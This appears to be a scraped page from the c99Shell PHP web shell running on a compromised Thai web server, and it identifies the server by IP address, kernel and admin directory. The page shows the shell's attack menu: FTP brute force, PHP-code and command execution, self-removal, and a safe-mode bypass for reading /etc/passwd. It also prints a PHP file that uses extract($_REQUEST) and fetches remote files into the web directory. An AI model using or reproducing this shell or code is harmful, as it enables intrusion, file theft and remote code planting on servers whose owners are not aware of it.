110.164.51.230 - phpshell

!c99Shell v. 1.0 pre-release build #16!
Software: Apache/2.2.3 (CentOS). PHP/5.1.6 uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44 EDT 2010 i686 uid=48(apache) gid=48(apache) groups=48(apache) Safe-mode: OFF (not secure) /var/www/html/mistk/mistk/eoffice/admin/ drwxr-xr-x Free 50.89 GB of 127.8 GB (39.82%) Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout

!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686

uid=48(apache) gid=48(apache) groups=48(apache)

Safe-mode: OFF (not secure)

/var/www/html/mistk/mistk/eoffice/admin/ drwxr-xr-x
Free 50.89 GB of 127.8 GB (39.82%)
Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout


<?php
extract ($_REQUEST);
function microtime_float(){
    list($usec, $sec) = explode(" ", microtime());
    return ((float)$usec + (float)$sec);
}

function downloadRemoteFile($tsr_fr_node,$url,$dir,$file_name = NULL){ 

    if($file_name == NULL){ $file_name = basename($url); } 
    $file_name_write=$file_name;
    
    $url_stuff = parse_url($url); 

    $port = isset($url_stuff['port']) ? $url_stuff['port'] : 80; 

    $fp = fsockopen($url_stuff['host'], $port); 
    if(!$fp){ return false;} 

    $query  = 'GET ' . $url_stuff['path'] . " HTTP/1.0\n"; 
    $query .= 'Host: ' . $url_stuff['host']; 
    $query .= "\n\n"; 
    fwrite($fp, $query); 
    while ($tmp = fread($fp, 1024))   { 
        $buffer .= $tmp; 
        //echo ".";
        //echo $buffer.'<br>';
        flush();
        //ob_flush();
    } 
    preg_match('/Content-Length: ([0-9]+)/', $buffer, $parts); 
    $file_binary = substr($buffer, - $parts[1]); 
    if($file_name == NULL){ 
        $temp = explode(".",$url); 
        $file_name = $temp[count($temp)-1]; 
    } 
    //$file_open = fopen($dir . "/" . date('Y-m-d_His').$file_name,'w');
    
    //---add collegeId into filename
     list($filename_,$filetype_)=preg_split("/\./",$file_name_write);
     $filewrite=$filename_.'-'.$tsr_fr_node.'.'.$filetype_;
    
    /*$file_open = fopen($dir . "/" .$filewrite,'w');
    if(!$file_open){ return false; } 
    fwrite($file_open,$file_binary); 
    fclose($file_open); */

    if(file_exists($dir.$filewrite)) unlink($dir.$filewrite);
    $result = file_put_contents($dir.$filewrite, file_get_contents($url));

    return true; 

}
?>

:: Shadow's tricks :D ::
Useful Commands Warning. Kernel may be alerted using higher levels	Kernel Info:

:: Preddy's tricks :D ::
Php Safe-Mode Bypass (Read Files) File: eg: /etc/passwd	Php Safe-Mode Bypass (List Directories): Dir: eg: /etc/

:: Command execute ::
Enter:	Select: